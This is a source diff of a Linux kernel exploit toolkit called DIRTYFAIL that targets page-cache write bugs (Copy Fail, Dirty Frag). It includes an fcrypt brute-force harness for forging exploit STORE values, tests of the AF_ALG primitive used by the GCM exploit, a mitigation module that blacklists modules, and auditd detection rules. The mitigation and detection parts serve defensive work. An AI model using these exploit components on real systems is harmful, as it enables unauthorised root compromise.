0x6a,0x1a,0x85,0xbd,0xb6,0xfd,0xfe,0x17,0x3f,0x09,0xa3,0x8d,0xfb,0xed,0xda,0x1d,
0x6d,0x1c,0x6c,0x01,0x5a,0xe5,0x71,0x3e,0x8b,0x6b,0xbe,0x29,0xeb,0x12,0x19,0x34,
0xcd,0xb3,0xbd,0x35,0xea,0x4b,0xd5,0xae,0x2a,0x79,0x5a,0xa5,0x32,0x12,0x7b,0xdc,
0x2c,0xd0,0x22,0x4b,0xb1,0x85,0x59,0x80,0xc0,0x30,0x9f,0x73,0xd3,0x14,0x48,0x40,
0x07,0x2d,0x8f,0x80,0x0f,0xce,0x0b,0x5e,0xb7,0x5e,0xac,0x24,0x94,0x4a,0x18,0x15,
0x05,0xe8,0x02,0x77,0xa9,0xc7,0x40,0x45,0x89,0xd1,0xea,0xde,0x0c,0x79,0x2a,0x99,
0x6c,0x3e,0x95,0xdd,0x8c,0x7d,0xad,0x6f,0xdc,0xff,0xfd,0x62,0x47,0xb3,0x21,0x8a,
0xec,0x8e,0x19,0x18,0xb4,0x6e,0x3d,0xfd,0x74,0x54,0x1e,0x04,0x85,0xd8,0xbc,0x1f,
0x56,0xe7,0x3a,0x56,0x67,0xd6,0xc8,0xa5,0xf3,0x8e,0xde,0xae,0x37,0x49,0xb7,0xfa,
0xc8,0xf4,0x1f,0xe0,0x2a,0x9b,0x15,0xd1,0x34,0x0e,0xb5,0xe0,0x44,0x78,0x84,0x59,
0x56,0x68,0x77,0xa5,0x14,0x06,0xf5,0x2f,0x8c,0x8a,0x73,0x80,0x76,0xb4,0x10,0x86,
};
static const uint8_t SBOX3_RAW[256] = {
0xa9,0x2a,0x48,0x51,0x84,0x7e,0x49,0xe2,0xb5,0xb7,0x42,0x33,0x7d,0x5d,0xa6,0x12,
0x44,0x48,0x6d,0x28,0xaa,0x20,0x6d,0x57,0xd6,0x6b,0x5d,0x72,0xf0,0x92,0x5a,0x1b,
0x53,0x80,0x24,0x70,0x9a,0xcc,0xa7,0x66,0xa1,0x01,0xa5,0x41,0x97,0x41,0x31,0x82,
0xf1,0x14,0xcf,0x53,0x0d,0xa0,0x10,0xcc,0x2a,0x7d,0xd2,0xbf,0x4b,0x1a,0xdb,0x16,
0x47,0xf6,0x51,0x36,0xed,0xf3,0xb9,0x1a,0xa7,0xdf,0x29,0x43,0x01,0x54,0x70,0xa4,
0xbf,0xd4,0x0b,0x53,0x44,0x60,0x9e,0x23,0xa1,0x18,0x68,0x4f,0xf0,0x2f,0x82,0xc2,
0x2a,0x41,0xb2,0x42,0x0c,0xed,0x0c,0x1d,0x13,0x3a,0x3c,0x6e,0x35,0xdc,0x60,0x65,
0x85,0xe9,0x64,0x02,0x9a,0x3f,0x9f,0x87,0x96,0xdf,0xbe,0xf2,0xcb,0xe5,0x6c,0xd4,
0x5a,0x83,0xbf,0x92,0x1b,0x94,0x00,0x42,0xcf,0x4b,0x00,0x75,0xba,0x8f,0x76,0x5f,
0x5d,0x3a,0x4d,0x09,0x12,0x08,0x38,0x95,0x17,0xe4,0x01,0x1d,0x4c,0xa9,0xcc,0x85,
0x82,0x4c,0x9d,0x2f,0x3b,0x66,0xa1,0x34,0x10,0xcd,0x59,0x89,0xa5,0x31,0xcf,0x05,
0xc8,0x84,0xfa,0xc7,0xba,0x4e,0x8b,0x1a,0x19,0xf1,0xa1,0x3b,0x18,0x12,0x17,0xb0,
0x98,0x8d,0x0b,0x23,0xc3,0x3a,0x2d,0x20,0xdf,0x13,0xa0,0xa8,0x4c,0x0d,0x6c,0x2f,
0x47,0x13,0x13,0x52,0x1f,0x2d,0xf5,0x79,0x3d,0xa2,0x54,0xbd,0x69,0xc8,0x6b,0xf3,
0x05,0x28,0xf1,0x16,0x46,0x40,0xb0,0x11,0xd3,0xb7,0x95,0x49,0xcf,0xc3,0x1d,0x8f,
0xd8,0xe1,0x73,0xdb,0xad,0xc8,0xc9,0xa9,0xa1,0xc2,0xc5,0xe3,0xba,0xfc,0x0e,0x25,
};
/* -------- preprocessed 32-bit S-boxes ----------------------------------- *
*
* The round function does ROUND_KEY ^ HALF_BLOCK then four S-box lookups
* combined by XOR. To make this fast, fcrypt_init() pre-shifts each raw
* S-box byte b into its position in a 32-bit word and stores the word
* in big-endian byte order via htonl():
*
* SBOX0[b] = b << 3
* SBOX1[b] = ((b & 0x1f) << 27) | (b >> 5)
* (b rotated right by 5 bits within the 32-bit word)
* SBOX2[b] = b << 11
* SBOX3[b] = b << 19
*
* After all four are XORed, we get the round-function output directly
* in big-endian order, ready to XOR into the other half-block.
*/
static uint32_t SBOX0[256], SBOX1[256], SBOX2[256], SBOX3[256];
void fcrypt_init(void)
{
for (int i = 0; i < 256; i++) {
SBOX0[i] = htonl((uint32_t)SBOX0_RAW[i] << 3);
SBOX1[i] = htonl(((uint32_t)(SBOX1_RAW[i] & 0x1f) << 27) |
((uint32_t)SBOX1_RAW[i] >> 5));
SBOX2[i] = htonl((uint32_t)SBOX2_RAW[i] << 11);
SBOX3[i] = htonl((uint32_t)SBOX3_RAW[i] << 19);
}
}
/* -------- key schedule -------------------------------------------------- *
*
* The key is 8 bytes but only the high 7 bits of each byte are used:
* this is the standard 56-bit key, with the low bit of each byte serving
* as parity in the AFS rxkad token format. We pack:
*
* k_56 = (key[0]>>1) || (key[1]>>1) || ... || (key[7]>>1) (56 bits)
*
* Then derive 16 round keys by emitting the low 32 bits of k_56 and
* rotating right by 11 bits between each:
*
* round_key[0] = k_56[0..31]
* k_56 = ROR_56(k_56, 11)
* round_key[1] = k_56[0..31]
* ...
* round_key[15] = k_56[0..31] (no rotation after the last)
*/
#define ROR56_11(k) \
((k) = ((k) >> 11) | (((k) & ((1ULL << 11) - 1)) << (56 - 11)))
void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8])
{
uint64_t k = 0;
for (int i = 0; i < 8; i++) {
k = (k << 7) | (uint64_t)(key[i] >> 1);
}
/* k is now 56 bits in the low order of a uint64_t. */
for (int i = 0; i < 16; i++) {
ctx->round_key[i] = htonl((uint32_t)k);
if (i < 15) ROR56_11(k);
}
}
/* -------- decrypt ------------------------------------------------------- *
*
* Standard 16-round Feistel decrypt with reversed round-key order.
* The round function FF mixes the round key into one half-block, splits
* into 4 bytes, and XORs the four S-box outputs into the other half.
*/
#define FF(R_, L_, k_) do { \
union { uint32_t w; uint8_t b[4]; } u; \
u.w = (k_) ^ (R_); \
(L_) ^= SBOX0[u.b[0]] ^ SBOX1[u.b[1]] ^ SBOX2[u.b[2]] ^ SBOX3[u.b[3]]; \
} while (0)
void fcrypt_decrypt(const fcrypt_ctx *ctx,
uint8_t out[8], const uint8_t in[8])
{
uint32_t L, R;
memcpy(&L, in, 4);
memcpy(&R, in + 4, 4);
FF(L, R, ctx->round_key[0xf]);
FF(R, L, ctx->round_key[0xe]);
FF(L, R, ctx->round_key[0xd]);
FF(R, L, ctx->round_key[0xc]);
FF(L, R, ctx->round_key[0xb]);
FF(R, L, ctx->round_key[0xa]);
FF(L, R, ctx->round_key[0x9]);
FF(R, L, ctx->round_key[0x8]);
FF(L, R, ctx->round_key[0x7]);
FF(R, L, ctx->round_key[0x6]);
FF(L, R, ctx->round_key[0x5]);
FF(R, L, ctx->round_key[0x4]);
FF(L, R, ctx->round_key[0x3]);
FF(R, L, ctx->round_key[0x2]);
FF(L, R, ctx->round_key[0x1]);
FF(R, L, ctx->round_key[0x0]);
memcpy(out, &L, 4);
memcpy(out + 4, &R, 4);
}
/* -------- self-test ----------------------------------------------------- */
bool fcrypt_selftest(void)
{
fcrypt_ctx ctx;
uint8_t out[8];
/* Vector 1: all-zero key. Catches gross structural bugs but the
* key schedule produces all-zero round keys, so it can't catch
* subtle bugs in the 7-bit packing or 11-bit rotation. */
static const uint8_t k1[8] = {0,0,0,0,0,0,0,0};
static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41};
fcrypt_setkey(&ctx, k1);
fcrypt_decrypt(&ctx, out, c1);
if (memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) != 0)
return false;
/* Vector 2: non-zero key, exercises every byte of the key schedule
* and round-key emit. Pulled from the kernel's crypto/testmgr.h
* fcrypt-pcbc test vector. */
static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66};
static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80};
static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0};
fcrypt_setkey(&ctx, k2);
fcrypt_decrypt(&ctx, out, c2);
if (memcmp(out, p2, 8) != 0)
return false;
return true;
}
/* -------- brute-force harness ------------------------------------------- *
*
* splitmix64: a fast, statistically decent generator with no library
* dependency. Plenty for a "scan a 56-bit subspace until I hit a
* predicate" loop. Each call advances the seed and returns a 64-bit
* pseudorandom value, which we treat as the 8-byte candidate key.
*/
static uint64_t splitmix64(uint64_t *s)
{
uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
return z ^ (z >> 31);
}
bool fcrypt_brute_force(const uint8_t ciphertext[8],
fcrypt_pred_fn predicate,
uint64_t max_iters,
uint64_t seed,
const char *label,
uint8_t key_out[8],
uint8_t plaintext_out[8])
{
fcrypt_ctx ctx;
uint8_t k[8], p[8];
struct timespec t0, t1;
clock_gettime(CLOCK_MONOTONIC, &t0);
for (uint64_t i = 0; i < max_iters; i++) {
uint64_t r = splitmix64(&seed);
memcpy(k, &r, 8);
fcrypt_setkey(&ctx, k);
fcrypt_decrypt(&ctx, p, ciphertext);
if (predicate(p)) {
clock_gettime(CLOCK_MONOTONIC, &t1);
double dt = (t1.tv_sec - t0.tv_sec) +
(t1.tv_nsec - t0.tv_nsec) / 1e9;
log_ok("%s found after %llu iters in %.2fs (%.2f Mops/s)",
label, (unsigned long long)i, dt,
(i + 1) / dt / 1e6);
memcpy(key_out, k, 8);
memcpy(plaintext_out, p, 8);
return true;
}
}
clock_gettime(CLOCK_MONOTONIC, &t1);
double dt = (t1.tv_sec - t0.tv_sec) +
(t1.tv_nsec - t0.tv_nsec) / 1e9;
log_bad("%s exhausted %llu iters in %.2fs without a hit — predicate too strict?",
label, (unsigned long long)max_iters, dt);
return false;
}
+68
@@ -0,0 +1,68 @@
/*
* DIRTYFAIL fcrypt.h
*
* fcrypt is the Andrew File System (AFS) rxkad cipher: 56-bit key,
* 8-byte block, 16-round Feistel structure with four 256-entry S-boxes.
* It is *deterministic*, with a public algorithm specification, and its
* key space (2^56) is small enough that targeted decryption can be
* brute-forced in user space at ~15-20 M ops / second on a single core.
*
* That property is what makes the RxRPC variant of Dirty Frag
* (CVE-2026-43500) practical: the in-place 8-byte STORE is
* fcrypt_decrypt(C, K), where C is the ciphertext at the target file
* offset and K is the session key the attacker registers via
* add_key("rxrpc", ...). For each STORE position we want, we run the
* fcrypt brute force locally until we find a K such that the resulting
* 8-byte plaintext matches our predicate (e.g. starts with "::").
*
* License: see NOTICE.md. The S-box constants are the rxkad protocol
* tables (also present in the Linux kernel's crypto/fcrypt.c, GPL-2.0,
* David Howells / KTH).
*/
#ifndef DIRTYFAIL_FCRYPT_H
#define DIRTYFAIL_FCRYPT_H
#include "common.h"
typedef struct {
uint32_t round_key[16]; /* big-endian, derived in fcrypt_setkey */
} fcrypt_ctx;
/* Initialize the global S-box tables. Call once before any other fcrypt_*. */
void fcrypt_init(void);
/* Run the kernel test vectors and return true if they match. Use this
* during exploit setup to fail fast on a broken build. */
bool fcrypt_selftest(void);
/* Derive the 16 round keys from an 8-byte key (only the high 7 bits of
* each byte are used; bit 0 of each byte is parity in the rxkad token
* format). */
void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8]);
/* Decrypt a single 8-byte block. */
void fcrypt_decrypt(const fcrypt_ctx *ctx,
uint8_t out[8], const uint8_t in[8]);
/* Brute-force search predicate: given an 8-byte candidate plaintext,
* return true if it satisfies the constraints we want at this STORE
* position. */
typedef bool (*fcrypt_pred_fn)(const uint8_t plaintext[8]);
/* Search for an 8-byte key K such that fcrypt_decrypt(C, K) satisfies
* `predicate`. Returns true and fills K and the resulting plaintext on
* hit; returns false after `max_iters` non-hits.
*
* `seed` selects the search starting point (deterministic via splitmix64);
* pass time(NULL) for randomness across runs, or a fixed value for
* reproducibility. `label` is logged on hit/timeout for clarity. */
bool fcrypt_brute_force(const uint8_t ciphertext[8],
fcrypt_pred_fn predicate,
uint64_t max_iters,
uint64_t seed,
const char *label,
uint8_t key_out[8],
uint8_t plaintext_out[8]);
#endif
+182
@@ -0,0 +1,182 @@
/*
* DIRTYFAIL mitigate.c: defensive deployment
*
* See mitigate.h for the design.
*/
#include "mitigate.h"
#include <fcntl.h>
#include <sys/stat.h>
#include <stdlib.h>
#define MODPROBE_CONF "/etc/modprobe.d/dirtyfail-mitigations.conf"
#define SYSCTL_CONF "/etc/sysctl.d/99-dirtyfail-mitigations.conf"
/* Modules to blacklist. Each is the kernel module name + reason. */
static const struct {
const char *name;
const char *reason;
} BLACKLIST[] = {
{"algif_aead", "Copy Fail (CVE-2026-31431) — authencesn page-cache STORE primitive"},
{"esp4", "Dirty Frag (CVE-2026-43284) — xfrm-ESP IPv4 path"},
{"esp6", "Dirty Frag (CVE-2026-43284) — xfrm-ESP IPv6 path"},
{"rxrpc", "Dirty Frag (CVE-2026-43500) — RxRPC pcbc(fcrypt) path"},
{NULL, NULL},
};
static bool write_file(const char *path, const char *content)
{
int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
if (fd < 0) return false;
size_t n = strlen(content);
ssize_t got = write(fd, content, n);
close(fd);
return got == (ssize_t)n;
}
static bool require_root(void)
{
if (geteuid() != 0) {
log_bad("mitigate requires root — re-run as `sudo dirtyfail --mitigate`");
return false;
}
return true;
}
static int rmmod_if_loaded(const char *name)
{
/* Shell out to lsmod/rmmod (resolved via PATH). The script exits 0 if
* the module was not loaded or the unload succeeded, and exits 1 if
* rmmod failed, so the return value reflects the shell's exit status. */
char cmd[256];
snprintf(cmd, sizeof(cmd),
"if lsmod | grep -q '^%s '; then "
" if rmmod %s 2>/dev/null; then echo unloaded; "
" else echo \"unload failed (in use?)\"; exit 1; fi; "
"else "
" echo \"not loaded\"; "
"fi", name, name);
return system(cmd) == 0 ? 0 : 1;
}
df_result_t mitigate_apply(void)
{
log_step("DIRTYFAIL — defensive mitigation deployment");
if (!require_root()) return DF_TEST_ERROR;
log_warn("about to apply system-wide mitigations:");
log_warn(" 1. blacklist algif_aead, esp4, esp6, rxrpc via modprobe");
log_warn(" 2. unload those modules if loaded");
log_warn(" 3. set kernel.apparmor_restrict_unprivileged_userns=1 (where AA loaded)");
log_warn(" 4. drop page cache");
fputc('\n', stderr);
log_warn("SIDE EFFECTS:");
log_warn(" - blacklisting esp4/esp6 BREAKS IPsec / strongSwan / libreswan VPNs");
log_warn(" - blacklisting rxrpc BREAKS AFS distributed file system clients");
log_warn(" - blacklisting algif_aead BREAKS userspace AEAD via AF_ALG (rare)");
fputc('\n', stderr);
log_warn("undo with `dirtyfail --cleanup-mitigate` (removes config files, leaves modules unloaded)");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
/* 1. Write modprobe blacklist */
char buf[2048];
char *p = buf;
p += snprintf(p, sizeof(buf) - (p - buf),
"# DIRTYFAIL mitigations — blacklist modules that expose the\n"
"# Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284,\n"
"# CVE-2026-43500) page-cache write primitives.\n"
"#\n"
"# Generated by `dirtyfail --mitigate`. Remove with\n"
"# `dirtyfail --cleanup-mitigate` or by deleting this file.\n"
"\n");
for (int i = 0; BLACKLIST[i].name; i++) {
p += snprintf(p, sizeof(buf) - (p - buf),
"# %s\n"
"install %s /bin/false\n",
BLACKLIST[i].reason, BLACKLIST[i].name);
}
if (!write_file(MODPROBE_CONF, buf)) {
log_bad("failed to write %s: %s", MODPROBE_CONF, strerror(errno));
return DF_TEST_ERROR;
}
log_ok("wrote %s", MODPROBE_CONF);
/* 2. Unload currently loaded modules */
log_step("unloading currently-loaded modules:");
for (int i = 0; BLACKLIST[i].name; i++) {
printf(" %s: ", BLACKLIST[i].name);
fflush(stdout);
rmmod_if_loaded(BLACKLIST[i].name);
}
/* 3. Set AppArmor sysctl (only if AA is loaded) */
int sysctl_fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_WRONLY);
if (sysctl_fd >= 0) {
if (write(sysctl_fd, "1\n", 2) == 2)
log_ok("set apparmor_restrict_unprivileged_userns=1 (runtime)");
else
log_warn("could not set apparmor_restrict_unprivileged_userns: %s", strerror(errno));
close(sysctl_fd);
/* Persist via sysctl.d */
const char *sysctl_content =
"# DIRTYFAIL mitigations — block unprivileged userns capability acquisition.\n"
"# This prevents the xfrm-ESP / RxRPC / GCM exploit infrastructure from\n"
"# obtaining CAP_NET_ADMIN inside a fresh user namespace.\n"
"kernel.apparmor_restrict_unprivileged_userns = 1\n";
if (write_file(SYSCTL_CONF, sysctl_content))
log_ok("wrote %s (persists across reboot)", SYSCTL_CONF);
else
log_warn("could not write %s: %s", SYSCTL_CONF, strerror(errno));
} else {
log_hint("AppArmor sysctl not present (kernel without AA, or AA not loaded) — skipping");
}
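/* 4. Drop page cache. Report failures so the operator knows that any
* previously modified pages may still be resident. */
int dc = open("/proc/sys/vm/drop_caches", O_WRONLY);
if (dc >= 0) {
ssize_t n = write(dc, "3\n", 2);
int werr = errno; /* save before close() can overwrite it */
close(dc);
if (n == 2) log_ok("dropped page cache");
else log_warn("could not drop page cache: %s", strerror(werr));
} else {
log_warn("could not open /proc/sys/vm/drop_caches: %s", strerror(errno));
}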
fputc('\n', stdout);
log_ok("=== mitigation summary ===");
log_ok(" modprobe blacklist: %s", MODPROBE_CONF);
log_ok(" sysctl persistence: %s (written only if the AppArmor sysctl exists)", SYSCTL_CONF);
log_ok(" modules unloaded: algif_aead, esp4, esp6, rxrpc (where loaded)");
fputc('\n', stdout);
log_hint("Re-verify with `dirtyfail --scan` — should now report most modes as");
log_hint("preconditions missing or mitigated.");
fputc('\n', stdout);
log_hint("Ultimate fix: install kernel update with f4c50a4034e6 backport.");
return DF_OK;
}
df_result_t mitigate_revert(void)
{
log_step("DIRTYFAIL — revert mitigations");
if (!require_root()) return DF_TEST_ERROR;
log_warn("removing %s + %s", MODPROBE_CONF, SYSCTL_CONF);
log_warn("modules will NOT be auto-loaded — operator decides if/when");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined");
return DF_OK;
}
if (unlink(MODPROBE_CONF) == 0) log_ok("removed %s", MODPROBE_CONF);
else if (errno == ENOENT) log_hint("%s did not exist", MODPROBE_CONF);
else log_bad("unlink %s: %s", MODPROBE_CONF, strerror(errno));
if (unlink(SYSCTL_CONF) == 0) log_ok("removed %s", SYSCTL_CONF);
else if (errno == ENOENT) log_hint("%s did not exist", SYSCTL_CONF);
else log_bad("unlink %s: %s", SYSCTL_CONF, strerror(errno));
log_hint("modules can be reloaded individually with `sudo modprobe <name>`");
return DF_OK;
}
+46
@@ -0,0 +1,46 @@
/*
* DIRTYFAIL mitigate.h
*
* Defensive companion to the exploit modes: applies all known
* mitigations for Copy Fail / Dirty Frag in one shot. Intended for
* sysadmins who want a fast "fix this until the kernel patch lands"
* deployment.
*
* What `--mitigate` does:
*
* 1. Writes /etc/modprobe.d/dirtyfail-mitigations.conf with
* `install <mod> /bin/false` blacklists for:
* - algif_aead (Copy Fail authencesn primitive)
* - esp4 + esp6 (Dirty Frag xfrm-ESP path)
* - rxrpc (Dirty Frag RxRPC path)
*
* 2. rmmods any of those that are currently loaded.
*
* 3. Sets `kernel.apparmor_restrict_unprivileged_userns=1` (where
* AppArmor is loaded). Persists via /etc/sysctl.d/.
*
* 4. Drops the page cache to evict any pre-existing page-cache
* modifications.
*
* 5. Reports what it did so the operator can audit / undo.
*
* Caveats:
* - Requires root.
* - Disabling esp4/esp6 breaks IPsec / strongSwan.
* - Disabling rxrpc breaks AFS clients.
* - These are interim mitigations; the right fix is the kernel patch.
*
* Run with `--cleanup-mitigate` to undo (removes the blacklist conf,
* removes the sysctl conf, but does not reload modules; the operator
* decides if/when to reload).
*/
#ifndef DIRTYFAIL_MITIGATE_H
#define DIRTYFAIL_MITIGATE_H
#include "common.h"
df_result_t mitigate_apply(void);
df_result_t mitigate_revert(void);
#endif
@@ -0,0 +1,101 @@
/*
* tests/test_aes_ecb.c
*
* Verifies that the kernel's AF_ALG `ecb(aes)` implementation produces
* the expected outputs for known AES-128-ECB test vectors. This is the
* primitive that copyfail_gcm.c uses to compute GCM keystream byte 0
* via the J0+1 counter block trick.
*
* If this test passes, the AES primitive that the GCM brute-force loop
* relies on behaves as specified. If it fails, the kernel's AES
* implementation differs from spec, and no exploit will produce the
* right STORE values.
*
* Linux-only. Uses the same AF_ALG primitives as copyfail_gcm.c.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
static int failures = 0;
#define ASSERT(cond, msg, ...) do { \
if (!(cond)) { fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); failures++; } \
else { fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); } \
} while (0)
static int alg_open_ecb_aes(const unsigned char key[16])
{
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (s < 0) return -1;
struct sockaddr_alg sa = { .salg_family = AF_ALG };
strcpy((char *)sa.salg_type, "skcipher");
strcpy((char *)sa.salg_name, "ecb(aes)");
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(s); return -1; }
if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 16) < 0) { close(s); return -1; }
return s;
}
static int aes_ecb_encrypt(int s, const unsigned char in[16], unsigned char out[16])
{
int op = accept(s, NULL, NULL);
if (op < 0) return -1;
char cbuf[CMSG_SPACE(sizeof(int))] = {0};
struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) };
struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_OP; c->cmsg_len = CMSG_LEN(sizeof(int));
*(int *)CMSG_DATA(c) = ALG_OP_ENCRYPT;
struct iovec iov = { .iov_base = (void *)in, .iov_len = 16 };
msg.msg_iov = &iov; msg.msg_iovlen = 1;
if (sendmsg(op, &msg, 0) != 16) { close(op); return -1; }
int n = read(op, out, 16);
close(op);
return n == 16 ? 0 : -1;
}
int main(void)
{
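/* Known-answer vector: AES-128 ECB with key == plaintext. (This is not
* the FIPS-197 Appendix C.1 example, which uses
* pt = 00112233445566778899aabbccddeeff.)
* key = 000102030405060708090a0b0c0d0e0f
* pt = 000102030405060708090a0b0c0d0e0f
* ct = 0a940bb5416ef045f1c39458c653ea5a
*/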
unsigned char key[16], in[16], out[16];
for (int i = 0; i < 16; i++) { key[i] = i; in[i] = i; }
static const unsigned char expected[16] = {
0x0a,0x94,0x0b,0xb5,0x41,0x6e,0xf0,0x45,
0xf1,0xc3,0x94,0x58,0xc6,0x53,0xea,0x5a
};
int s = alg_open_ecb_aes(key);
ASSERT(s >= 0, "AF_ALG skcipher ecb(aes) bindable + keyable");
if (s < 0) return 1;
ASSERT(aes_ecb_encrypt(s, in, out) == 0, "single-block ECB encrypt completes");
ASSERT(memcmp(out, expected, 16) == 0,
"ECB(K=0..15, P=0..15) = 0a940bb5416ef045f1c39458c653ea5a");
if (memcmp(out, expected, 16) != 0) {
fprintf(stderr, " got: ");
for (int i = 0; i < 16; i++) fprintf(stderr, "%02x", out[i]);
fprintf(stderr, "\n");
}
/* GCM J0+1 counter block sanity: nonce(12) || 0x00000002. Byte 0 of
* the encrypted block is the keystream byte that XORs onto plaintext
* byte 0 in GCM. We don't verify against a specific GCM vector here
* (no canonical short test for this), just that the operation runs. */
unsigned char counter[16];
memset(counter, 0xab, 12);
counter[12] = 0; counter[13] = 0; counter[14] = 0; counter[15] = 2;
ASSERT(aes_ecb_encrypt(s, counter, out) == 0,
"GCM J0+1 counter block encrypt (keystream byte computation)");
close(s);
fprintf(stderr, "\n%d failure(s)\n", failures);
return failures > 0 ? 1 : 0;
}
@@ -0,0 +1,84 @@
/*
* tests/test_fcrypt.c
*
* Selftest for the rxkad fcrypt cipher implementation in src/fcrypt.c.
* Built standalone via `make test`. No DIRTYFAIL runtime needed.
*
* Verifies:
* - All-zero key vector (catches gross structural bugs)
* - Non-zero key vector from kernel testmgr.h (catches subtle bugs
* in 7-bit packing or 11-bit ROR key schedule)
* - Brute-force harness convergence (sanity-checks predicate gating)
*/
#include "../src/fcrypt.h"
#include "../src/common.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
static int failures = 0;
#define ASSERT(cond, msg, ...) do { \
if (!(cond)) { \
fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); \
failures++; \
} else { \
fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); \
} \
} while (0)
static bool predicate_match_first_byte(const uint8_t p[8])
{
return p[0] == 0xAB;
}
int main(void)
{
fcrypt_init();
/* Selftest covers both vectors. */
ASSERT(fcrypt_selftest(),
"fcrypt_selftest passes (covers k=0 and k=1144...66 vectors)");
/* Spot-check vector 1 directly */
fcrypt_ctx ctx;
uint8_t out[8];
static const uint8_t k1[8] = {0,0,0,0,0,0,0,0};
static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41};
fcrypt_setkey(&ctx, k1);
fcrypt_decrypt(&ctx, out, c1);
ASSERT(memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) == 0,
"vector 1: decrypt(k=0, ct=0E0900C73EF7ED41) = 0000000000000000");
/* Spot-check vector 2 directly */
static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66};
static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80};
static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0};
fcrypt_setkey(&ctx, k2);
fcrypt_decrypt(&ctx, out, c2);
ASSERT(memcmp(out, p2, 8) == 0,
"vector 2: decrypt(k=114477AADD003366, ct=D8ED787477EC0680) = 123456789ABCDEF0");
/* Brute-force smoke test: search for K such that decrypt(C=0..7) starts with 0xAB.
* Predicate hit rate = 1/256, so ~256 iters expected. Hard cap at 1<<20. */
uint8_t key_out[8], pt_out[8];
static const uint8_t test_ct[8] = {0,1,2,3,4,5,6,7};
bool found = fcrypt_brute_force(test_ct, predicate_match_first_byte,
1 << 20, (uint64_t)time(NULL),
"smoke", key_out, pt_out);
ASSERT(found,
"brute force converges on first-byte=0xAB predicate within 1M iters");
if (found) {
/* Verify the discovered key actually produces the claimed plaintext */
fcrypt_setkey(&ctx, key_out);
fcrypt_decrypt(&ctx, out, test_ct);
ASSERT(memcmp(out, pt_out, 8) == 0 && out[0] == 0xAB,
"discovered key produces claimed plaintext (roundtrip OK)");
}
fprintf(stderr, "\n%d failure(s)\n", failures);
return failures > 0 ? 1 : 0;
}
@@ -0,0 +1,100 @@
# DIRTYFAIL — auditd detection rules
#
# Drop into /etc/audit/rules.d/, then reload:
#
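# sudo install -m 0640 99-dirtyfail.rules /etc/audit/rules.d/
# sudo augenrules --load
# sudo systemctl restart auditd
#
# (`augenrules --load` already loads the merged rules into the kernel, so
# the restart is usually optional. Some RHEL-family releases refuse
# `systemctl restart auditd`; use `service auditd restart` there.)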
#
# These rules generate audit events for the syscalls the DIRTYFAIL
# exploit chain uses. They are intentionally noisy on systems that
# legitimately use rootless containers, IPsec, or AFS — review the
# Tuning section before enabling on a production host.
#
# Search recorded events:
#
# sudo ausearch -k dirtyfail-xfrm
# sudo ausearch -k dirtyfail-rxkey
# sudo ausearch -k dirtyfail-userns
#
# Rules MUST stay on single lines — auditctl(8) does not honor
# backslash-newline continuations in rule files.
#
# Tested on: Debian 13, Ubuntu 24.04/26.04, AlmaLinux 10, Fedora 44.
## ----------------------------------------------------------------- ##
## 1. XFRM netlink registration from a non-root account
##
## socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM) is an extremely strong
## signal: legitimate use is "ip xfrm" (root) or `swanctl`/charon (root)
## or networkd (root). An unprivileged account creating this socket
## is the precondition for ESP v4/v6/GCM exploitation.
##
## socket() args: a0=family(16=AF_NETLINK) a2=protocol(6=NETLINK_XFRM)
## auid filter: ignore kernel/system processes (auid=4294967295)
## match interactive logins (auid >= 1000)
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm
-a always,exit -F arch=b32 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm
## ----------------------------------------------------------------- ##
## 2. add_key("rxrpc", ...) — RxRPC session-key registration
##
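## The rxkad-handshake forgery requires registering a rxrpc-typed key
## via add_key(2). auditd cannot filter on the key-type string (a0 is a
## userspace pointer), so these rules log every add_key(2) call from an
## interactive account; expect some unrelated keyring activity under
## this key. On most servers add_key("rxrpc", ...) should never happen
## from an unprivileged uid; AFS clients that legitimately use it run as
## root or a service account.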
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey
-a always,exit -F arch=b32 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey
